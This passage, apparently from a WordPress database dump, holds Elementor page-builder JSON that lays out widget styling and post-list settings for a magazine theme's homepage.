list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"51.918\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"s3s3gvd\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1108,409,'_elementor_version','0.4'),(1109,409,'_elementor_css','a:3:{s:4:\"time\";i:1508852751;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1111,410,'_elementor_edit_mode','builder'),(1112,410,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"un